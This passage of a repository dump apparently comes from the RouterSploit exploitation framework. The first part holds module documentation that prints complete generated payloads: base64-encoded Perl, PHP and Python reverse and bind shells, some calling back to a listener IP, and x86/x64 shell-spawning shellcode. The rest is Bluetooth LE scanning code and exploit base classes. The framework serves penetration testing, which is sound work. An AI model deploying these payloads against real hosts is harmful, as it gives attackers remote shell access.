reverse shell by using perl. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/perl/reverse_tcp`\n 3. Do: `set lhost 192.168.1.3`\n 3. Do: `set lport 4321`\n 4. Do: `run`\n 5. Module generates perl tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/perl/reverse_tcp\nrsf (Perl Reverse TCP) > set lhost 192.168.1.3\n[+] lhost => 192.168.1.3\nrsf (Perl Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (Perl Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\nuse MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='))\n```\n" }, { "path": "docs/modules/payloads/php/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using php. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/php/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates php tcp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/php/bind_tcp\nrsf (PHP Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (PHP Bind TCP) > run\n[*] Running module...\n[*] Generating payload\neval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));\n```\n" }, { "path": "docs/modules/payloads/php/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using php. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/php/reverse_udp`\n 3. Do: `set lhost 192.168.1.4`\n 3. Do: `set lport 4321`\n 4. Do: `run`\n 5. Module generates php tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/php/reverse_tcp\nrsf (PHP Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (PHP Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (PHP Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\neval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\n```\n" }, { "path": "docs/modules/payloads/python/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell by using python. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/python/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates python tcp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/python/bind_tcp\nrsf (Python Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (Python Bind TCP) > run\n[*] Running module...\n[*] Generating payload\nexec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))\n```\n" }, { "path": "docs/modules/payloads/python/bind_udp.md", "content": "## Description\n\nModule generates payload that creates interactive udp bind shell by using python. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/python/bind_udp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates python udp bind shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/python/bind_udp\nrsf (Python Bind UDP) > set rport 4321\n[+] rport => 4321\nrsf (Python Bind UDP) > run\n[*] Running module...\n[*] Generating payload\nexec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))\n```\n" }, { "path": "docs/modules/payloads/python/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell by using python. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/python/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 3. Do: `set lport 4321`\n 4. Do: `run`\n 5. Module generates python tcp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/python/reverse_tcp\nrsf (Python Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Python Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (Python Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\nexec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))\n```\n" }, { "path": "docs/modules/payloads/python/reverse_udp.md", "content": "## Description\n\nModule generates payload that creates interactive udp reverse shell by using python. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/python/reverse_udp`\n 3. Do: `set lhost 192.168.1.4`\n 3. Do: `set lport 4321`\n 4. Do: `run`\n 5. Module generates python udp reverse shell payload\n\n## Scenarios\n\n```\nrsf > use payloads/python/reverse_udp\nrsf (Python Reverse UDP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (Python Reverse UDP) > set lport 4321\n[+] lport => 4321\nrsf (Python Reverse UDP) > run\n[*] Running module...\n[*] Generating payload\nexec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))\n```\n" }, { "path": "docs/modules/payloads/x64/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell for X64 architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/x64/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates x64 bind shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/x64/bind_tcp\nrsf (X64 Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (X64 Bind TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05\\x48\\x97\\x52\"\n \"\\xc7\\x04\\x24\\x02\\x00\\x10\\xe1\\x48\\x89\\xe6\\x6a\\x10\\x5a\\x6a\\x31\"\n \"\\x58\\x0f\\x05\\x6a\\x32\\x58\\x0f\\x05\\x48\\x31\\xf6\\x6a\\x2b\\x58\\x0f\"\n \"\\x05\\x48\\x97\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58\\x0f\\x05\\x75\"\n \"\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\"\n \"\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x0f\\x05\"\n)\n```\n" }, { "path": "docs/modules/payloads/x64/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell for X64 architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/x64/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Module generates x64 reverse shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/x64/reverse_tcp\nrsf (X64 Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (X64 Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (X64 Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05\\x48\\x97\\x48\"\n \"\\xb9\\x02\\x00\\x10\\xe1\\xc0\\xa8\\x01\\x04\\x51\\x48\\x89\\xe6\\x6a\\x10\"\n \"\\x5a\\x6a\\x2a\\x58\\x0f\\x05\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58\"\n \"\\x0f\\x05\\x75\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\"\n \"\\x73\\x68\\x00\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x0f\\x05\"\n)\n```\n" }, { "path": "docs/modules/payloads/x86/bind_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp bind shell for X86 architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/x86/bind_tcp`\n 3. Do: `set rport 4321`\n 4. Do: `run`\n 5. Module generates x86 bind shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/x86/bind_tcp\nrsf (X86 Bind TCP) > set rport 4321\n[+] rport => 4321\nrsf (X86 Bind TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\"\n \"\\x5b\\x5e\\x52\\x68\\x02\\x00\\x10\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\x6a\"\n \"\\x66\\x58\\xcd\\x80\\x89\\x41\\x04\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x43\\xb0\"\n \"\\x66\\xcd\\x80\\x93\\x59\\x6a\\x3f\\x58\\xcd\\x80\\x49\\x79\\xf8\\x68\\x2f\"\n \"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\"\n \"\\x0b\\xcd\\x80\"\n)\n```\n" }, { "path": "docs/modules/payloads/x86/reverse_tcp.md", "content": "## Description\n\nModule generates payload that creates interactive tcp reverse shell for X86 architecture.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use payloads/x86/reverse_tcp`\n 3. Do: `set lhost 192.168.1.4`\n 4. Do: `set lport 4321`\n 5. Module generates x86 reverse shell tcp payload\n\n## Scenarios\n\n```\nrsf > use payloads/x86/reverse_tcp\nrsf (X86 Reverse TCP) > set lhost 192.168.1.4\n[+] lhost => 192.168.1.4\nrsf (X86 Reverse TCP) > set lport 4321\n[+] lport => 4321\nrsf (X86 Reverse TCP) > run\n[*] Running module...\n[*] Generating payload\n[+] Building payload for python\npayload = (\n \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\"\n \"\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68\\xc0\\xa8\\x01\\x04\\x68\"\n \"\\x02\\x00\\x10\\xe1\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\"\n \"\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\"\n \"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n)\n```\n" }, { "path": "requirements-dev.txt", "content": "requests==2.32.2\nparamiko\npysnmp==4.4.6\npycryptodome\npytest==4.4.0\npytest-forked\npytest-xdist\nflake8\ngit+git://github.com/threat9/threat9-test-bed\ntelnetlib3\n" }, { "path": "requirements.txt", "content": "requests==2.32.2\nparamiko\npysnmp\npycryptodome\n" }, { "path": "routersploit/__init__.py", "content": "" }, { "path": "routersploit/core/__init__.py", "content": "" }, { "path": "routersploit/core/bluetooth/__init__.py", "content": "" }, { "path": "routersploit/core/bluetooth/btle/__init__.py", "content": "from .btle_device import (\n Device\n)\nfrom .btle_scanner import (\n BTLEScanner,\n ScanDelegate\n)\n\n\n__all__ = [\n \"Device\",\n \"BTLEScanner\",\n \"ScanDelegate\",\n]\n" }, { "path": "routersploit/core/bluetooth/btle/btle_device.py", "content": "import struct\nfrom bluepy.btle import (\n Peripheral,\n ScanEntry,\n AssignedNumbers\n)\nfrom routersploit.core.exploit.printer import (\n print_table,\n print_success,\n print_status,\n print_error,\n color_blue,\n color_green,\n color_red\n)\nfrom routersploit.core.exploit.utils import (\n lookup_vendor\n)\n\n\nclass Device(ScanEntry):\n \"\"\" Single discovered Bluetooth Low Energy device \"\"\"\n\n def __init__(self, addr, iface):\n ScanEntry.__init__(self, addr, iface)\n\n self.vendor = None\n self.data = []\n\n def _update(self, resp):\n ScanEntry._update(self, resp)\n\n if self.addrType == \"random\":\n self.vendor = \"None (Random MAC address)\"\n else:\n self.vendor = lookup_vendor(self.addr)\n\n if self.scanData:\n self.data = self._get_data(self.getScanData())\n\n def print_info(self):\n headers = (color_blue(\"{} ({} dBm)\").format(self.addr, self.rssi), \"\")\n if self.connectable:\n allow_connection = color_green(str(self.connectable))\n else:\n allow_connection = color_red(str(self.connectable))\n\n data = [\n (\"Vendor\", self.vendor),\n (\"Allow Connections\", allow_connection),\n ]\n\n for d in self.data:\n data.append((d[0], d[1]))\n\n print_table(headers, *data, max_column_length=70, extra_fill=3)\n\n def print_services(self):\n headers = (\"Handles\", \"Service > Characteristics\", \"Properties\", \"Data\")\n services = self.enumerate_services()\n\n if services:\n print_table(headers, *services, max_column_length=70, extra_fill=3)\n\n def enumerate_services(self):\n print_status(\"Starting enumerating {} ({} dBm) ...\".format(self.addr, self.rssi))\n\n try:\n dev = Peripheral(self, self.addrType)\n\n services = sorted(dev.services, key=lambda s: s.hndStart)\n\n data = []\n for service in services:\n if service.hndStart == service.hndEnd:\n continue\n\n data.append([\n \"{:04x} -> {:04x}\".format(service.hndStart, service.hndEnd),\n self._get_svc_description(service),\n \"\",\n \"\",\n ])\n\n for _, char in enumerate(service.getCharacteristics()):\n desc = self._get_char_description(char)\n props = char.propertiesToString()\n hnd = char.getHandle()\n value = self._get_char(char, props)\n\n data.append([\n \"{:04x}\".format(hnd), desc, props, value\n ])\n\n dev.disconnect()\n\n return data\n\n except Exception as err:\n print_error(err)\n\n try:\n dev.disconnect()\n except Exception as err:\n print_error(err)\n\n return None\n\n def write(self, characteristic, data):\n try:\n dev = Peripheral(self, self.addrType)\n\n services = sorted(dev.services, key=lambda s: s.hndStart)\n\n print_status(\"Searching for characteristic {}\".format(characteristic))\n char = None\n for service in services:\n if char is not None:\n break\n\n for _, c in enumerate(service.getCharacteristics()):\n if str(c.uuid) == characteristic:\n char = c\n break\n\n if char:\n if \"WRITE\" in char.propertiesToString():\n print_success(\"Sending {} bytes...\".format(len(data)))\n\n wwrflag = False\n\n if \"NO RESPONSE\" in char.propertiesToString():\n wwrflag = True\n\n try:\n char.write(data, wwrflag)\n print_success(\"Data sent\")\n except Exception as err:\n print_error(\"Error: {}\".format(err))\n\n else:\n print_error(\"Not writable\")\n\n dev.disconnect()\n\n except Exception as err:\n print_error(err)\n\n try:\n dev.disconnect()\n except Exception:\n pass\n\n return None\n\n def _get_data(self, scan_data):\n data = []\n for (tag, desc, val) in scan_data:\n if desc == \"Flags\":\n data.append((\"Flags\", self._get_flags(val)))\n\n elif tag in [8, 9]:\n try:\n data.append((desc, val))\n except UnicodeEncodeError:\n data.append((desc, repr(val)))\n\n else:\n data.append((desc, val))\n\n return data\n\n def _get_flags(self, data):\n bits = []\n flags = int(data, 16)\n\n if self._is_bit_set(flags, 0):\n bits.append(\"LE Limited Discoverable\")\n\n if self._is_bit_set(flags, 1):\n bits.append(\"LE General Discoverable\")\n\n if self._is_bit_set(flags, 2):\n bits.append(\"BR/EDR\")\n\n if self._is_bit_set(flags, 3):\n bits.append(\"LE + BR/EDR Controller Mode\")\n\n if self._is_bit_set(flags, 4):\n bits.append(\"LE + BR/EDR Host Mode\")\n\n return \", \".join(bits)\n\n def _is_bit_set(self, byteval, idx):\n return ((byteval & (1 << idx)) != 0)\n\n def _get_svc_description(self, service):\n uuid_name = service.uuid.getCommonName()\n\n if uuid_name and uuid_name != str(service.uuid):\n return \"{} ({})\".format(color_green(uuid_name), service.uuid)\n\n return str(service.uuid)\n\n def _get_char_description(self, char):\n char_name = char.uuid.getCommonName()\n if char_name and char_name != str(char.uuid):\n return \" {} ({})\".format(color_green(char_name), char.uuid)\n\n return \" {}\".format(char.uuid)\n\n def _get_char(self, char, props):\n string = \"\"\n if \"READ\" in props and \"INDICATE\" not in props:\n try:\n data = char.read()\n\n if char.uuid == AssignedNumbers.appearance:\n string = self._get_appearance(data)\n else:\n try:\n string = color_blue(repr(data.decode(\"utf-8\")))\n except Exception:\n string = repr(data)\n\n except Exception:\n pass\n\n return string\n\n def _get_appearance(self, data):\n appearance = {\n 0: \"Unknown\",\n 64: \"Generic Phone\",\n 128: \"Generic Computer\",\n 192: \"Generic Watch\",\n 193: \"Watch: Sports Watch\",\n 256: \"Generic Clock\",\n 320: \"Generic Display\",\n 384: \"Generic Remote Control\",\n 448: \"Generic Eye-glasses\",\n 512: \"Generic Tag\",\n 576: \"Generic Keyring\",\n 640: \"Generic Media Player\",\n 704: \"Generic Barcode Scanner\",\n 768: \"Generic Thermometer\",\n 769: \"Thermometer: Ear\",\n 832: \"Generic Heart rate Sensor\",\n 833: \"Heart Rate Sensor: Heart Rate Belt\",\n 896: \"Generic Blood Pressure\",\n 897: \"Blood Pressure: Arm\",\n 898: \"Blood Pressure: Wrist\",\n 960: \"Human Interface Device (HID)\",\n 961: \"Keyboard\",\n 962: \"Mouse\",\n 963: \"Joystick\",\n 964: \"Gamepad\",\n 965: \"Digitizer Tablet\",\n 966: \"Card Reader\",\n 967: \"Digital Pen\",\n 968: \"Barcode Scanner\",\n 1024: \"Generic Glucose Meter\",\n 1088: \"Generic: Running Walking Sensor\",\n 1089: \"Running Walking Sensor: In-Shoe\",\n 1090: \"Running Walking Sensor: On-Shoe\",\n 1091: \"Running Walking Sensor: On-Hip\",\n 1152: \"Generic: Cycling\",\n 1153: \"Cycling: Cycling Computer\",\n 1154: \"Cycling: Speed Sensor\",\n 1155: \"Cycling: Cadence Sensor\",\n 1156: \"Cycling: Power Sensor\",\n 1157: \"Cycling: Speed and Cadence Sensor\",\n 1216: \"Generic Control Device\",\n 1217: \"Switch\",\n 1218: \"Multi-switch\",\n 1219: \"Button\",\n 1220: \"Slider\",\n 1221: \"Rotary\",\n 1222: \"Touch-panel\",\n 1280: \"Generic Network Device\",\n 1281: \"Access Point\",\n 1344: \"Generic Sensor\",\n 1345: \"Motion Sensor\",\n 1346: \"Air Quality Sensor\",\n 1347: \"Temperature Sensor\",\n 1348: \"Humidity Sensor\",\n 1349: \"Leak Sensor\",\n 1350: \"Smoke Sensor\",\n 1351: \"Occupancy Sensor\",\n 1352: \"Contact Sensor\",\n 1353: \"Carbon Monoxide Sensor\",\n 1354: \"Carbon Dioxide Sensor\",\n 1355: \"Ambient Light Sensor\",\n 1356: \"Energy Sensor\",\n 1357: \"Color Light Sensor\",\n 1358: \"Rain Sensor\",\n 1359: \"Fire Sensor\",\n 1360: \"Wind Sensor\",\n 1361: \"Proximity Sensor\",\n 1362: \"Multi-Sensor\",\n 1408: \"Generic Light Fixtures\",\n 1409: \"Wall Light\",\n 1410: \"Ceiling Light\",\n 1411: \"Floor Light\",\n 1412: \"Cabinet Light\",\n 1413: \"Desk Light\",\n 1414: \"Troffer Light\",\n 1415: \"Pendant Light\",\n 1416: \"In-ground Light\",\n 1417: \"Flood Light\",\n 1418: \"Underwater Light\",\n 1419: \"Bollard with Light\",\n 1420: \"Pathway Light\",\n 1421: \"Garden Light\",\n 1422: \"Pole-top Light\",\n 1423: \"Spotlight\",\n 1424: \"Linear Light\",\n 1425: \"Street Light\",\n 1426: \"Shelves Light\",\n 1427: \"High-bay / Low-bay Light\",\n 1428: \"Emergency Exit Light\",\n 1472: \"Generic Fan\",\n 1473: \"Ceiling Fan\",\n 1474: \"Axial Fan\",\n 1475: \"Exhaust Fan\",\n 1476: \"Pedestal Fan\",\n 1477: \"Desk Fan\",\n 1478: \"Wall Fan\",\n 1536: \"Generic HVAC\",\n 1537: \"Thermostat\",\n 1600: \"Generic Air Conditioning\",\n 1664: \"Generic Humidifier\",\n 1728: \"Generic Heating\",\n 1729: \"Radiator\",\n 1730: \"Boiler\",\n 1731: \"Heat Pump\",\n 1732: \"Infrared Heater\",\n 1733: \"Radiant Panel Heater\",\n 1734: \"Fan Heater\",\n 1735: \"Air Curtain\",\n 1792: \"Generic Access Control\",\n 1793: \"Access Door\",\n 1794: \"Garage Door\",\n 1795: \"Emergency Exit Door\",\n 1796: \"Access Lock\",\n 1797: \"Elevator\",\n 1798: \"Window\",\n 1799: \"Entrance Gate\",\n 1856: \"Generic Motorized Device\",\n 1857: \"Motorized Gate\",\n 1858: \"Awning\",\n 1859: \"Blinds or Shades\",\n 1860: \"Curtains\",\n 1861: \"Screen\",\n 1920: \"Generic Power Device\",\n 1921: \"Power Outlet\",\n 1922: \"Power Strip\",\n 1923: \"Plug\",\n 1924: \"Power Supply\",\n 1925: \"LED Driver\",\n 1926: \"Fluorescent Lamp Gear\",\n 1927: \"HID Lamp Gear\",\n 1984: \"Generic Light Source\",\n 1985: \"Incandescent Light Bulb\",\n 1986: \"LED Bulb\",\n 1987: \"HID Lamp\",\n 1988: \"Fluorescent Lamp\",\n 1989: \"LED Array\",\n 1990: \"Multi-Color LED Array\",\n 3136: \"Generic: Pulse Oximeter\",\n 3137: \"Fingertip\",\n 3138: \"Wrist Worn\",\n 3200: \"Generic: Weight Scale\",\n 3264: \"Generic\",\n 3265: \"Powered Wheelchair\",\n 3266: \"Mobility Scooter\",\n 3328: \"Generic\",\n 5184: \"Generic: Outdoor Sports Activity\",\n 5185: \"Location Display Device\",\n 5186: \"Location and Navigation Display Device\",\n 5187: \"Location Pod\",\n 5188: \"Location and Navigation Pod\",\n }\n\n try:\n code = struct.unpack(\"h\", data)[0]\n\n if code in appearance.keys():\n return color_green(appearance[code])\n except Exception:\n pass\n\n return repr(data)\n" }, { "path": "routersploit/core/bluetooth/btle/btle_scanner.py", "content": "import time\nimport binascii\nfrom bluepy.btle import Scanner, DefaultDelegate\nfrom .btle_device import Device\n\n\nclass BTLEScanner(Scanner):\n \"\"\" Bluetooth Low Energy Scanner \"\"\"\n\n def __init__(self, mac=None, iface=0):\n Scanner.__init__(self, iface)\n self.mac = mac\n\n def _decode_address(self, resp):\n addr = binascii.b2a_hex(resp[\"addr\"][0]).decode(\"utf-8\")\n return \":\".join([addr[i: i + 2] for i in range(0, 12, 2)])\n\n def _find_or_create(self, addr):\n if addr in self.scanned:\n dev = self.scanned[addr]\n else:\n dev = Device(addr, self.iface)\n self.scanned[addr] = dev\n\n return dev\n\n def process(self, timeout=10.0):\n start = time.time()\n\n while True:\n if timeout:\n remain = start + timeout - time.time()\n if remain <= 0.0:\n break\n else:\n remain = None\n\n resp = self._waitResp([\"scan\", \"stat\"], remain)\n if resp is None:\n break\n\n respType = resp[\"rsp\"][0]\n\n if respType == \"stat\":\n if resp[\"state\"][0] == \"disc\":\n self._mgmtCmd(\"scan\")\n\n elif respType == \"scan\":\n addr = self._decode_address(resp)\n\n if not self.mac or addr == self.mac:\n dev = self._find_or_create(addr)\n\n newData = dev._update(resp)\n\n if self.delegate:\n self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), newData)\n\n if self.mac and dev.addr == self.mac:\n break\n\n\nclass ScanDelegate(DefaultDelegate):\n def __init__(self, options):\n DefaultDelegate.__init__(self)\n self.options = options\n\n def handleDiscovery(self, dev, isNewDev, isNewData):\n if not isNewDev:\n return\n elif self.options.mac and dev.addr != self.options.mac:\n return\n\n if self.options.buffering:\n dev.print_info()\n" }, { "path": "routersploit/core/bluetooth/btle_client.py", "content": "from routersploit.core.exploit.exploit import Exploit\nfrom routersploit.core.exploit.option import OptInteger\nfrom routersploit.core.exploit.printer import (\n print_error,\n print_status\n)\nfrom routersploit.core.bluetooth.btle import (\n ScanDelegate,\n BTLEScanner\n)\n\n\nclass Options:\n \"\"\" Options used by the scanner \"\"\"\n\n def __init__(self, buffering, mac, enum_services):\n self.buffering = buffering\n self.mac = mac\n self.enum_services = enum_services\n\n\nclass BTLEClient(Exploit):\n \"\"\" Bluetooth Low Energy Client implementation \"\"\"\n\n scan_time = OptInteger(10, \"Number of seconds to scan for\")\n buffering = False\n enum_services = False\n\n def btle_scan(self, mac=None):\n \"\"\" Scans for Bluetooth Low Energy devices \"\"\"\n\n options = Options(\n self.buffering,\n mac,\n self.enum_services\n )\n\n scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options))\n\n if options.mac:\n print_status(\"Scanning BTLE device...\")\n else:\n print_status(\"Scanning for BTLE devices...\")\n\n devices = []\n try:\n devices = [res for res in scanner.scan(self.scan_time)]\n except Exception as err:\n print_error(\"Error: {}\".format(err))\n print_error(\"Check if your bluetooth hardware is connected\")\n\n return devices\n" }, { "path": "routersploit/core/exploit/__init__.py", "content": "from routersploit.core.exploit.exploit import (\n Exploit,\n multi,\n mute,\n LockedIterator,\n)\n\nfrom routersploit.core.exploit.option import (\n OptIP,\n OptPort,\n OptInteger,\n OptFloat,\n OptBool,\n OptString,\n OptMAC,\n OptWordlist,\n)\n\nfrom routersploit.core.exploit.printer import (\n print_info,\n print_status,\n print_success,\n print_error,\n print_table,\n)\n\nfrom routersploit.core.exploit import utils\nfrom routersploit.core.exploit.shell import shell\n\n\n__all__ = [\n \"Exploit\",\n \"multi\",\n \"mute\",\n \"LockedIterator\",\n \"OptIP\",\n \"OptPort\",\n \"OptInteger\",\n \"OptFloat\",\n \"OptBool\",\n \"OptString\",\n \"OptMAC\",\n \"OptWordlist\",\n \"print_info\",\n \"print_status\",\n \"print_success\",\n \"print_error\",\n \"print_table\",\n \"utils\",\n \"shell\",\n]\n" }, { "path": "routersploit/core/exploit/encoders.py", "content": "from routersploit.core.exploit.exploit import BaseExploit\nfrom routersploit.core.exploit.printer import print_error\n\n\nclass BaseEncoder(BaseExploit):\n architecture = None\n\n def __init__(self):\n self.module_name = self.__module__.replace(\"routersploit.modules.encoders.\", \"\").replace(\".\", \"/\")\n\n def encode(self):\n raise NotImplementedError(\"Please implement 'encode()' method\")\n\n def run(self):\n print_error(\"Module cannot be run\")\n\n def __str__(self):\n return self.module_name\n\n def __format__(self, form):\n return format(self.module_name, form)\n" }, { "path": "routersploit/core/exploit/exceptions.py", "content": "class RoutersploitException(Exception):\n def __init__(self, msg: str = \"\"):\n super(RoutersploitException, self).__init__(msg)\n\n\nclass OptionValidationError(RoutersploitException):\n pass\n\n\nclass StopThreadPoolExecutor(RoutersploitException):\n pass\n" }, { "path": "routersploit/core/exploit/exploit.py", "content": "import os\nimport threading\nimport time\nfrom itertools import chain\nfrom functools import wraps\n\nfrom routersploit.core.exploit.printer import (\n print_status,\n thread_output_stream,\n)\nfrom routersploit.core.exploit.option import Option\n\nGLOBAL_OPTS = {}\n\n\nclass Protocol:\n 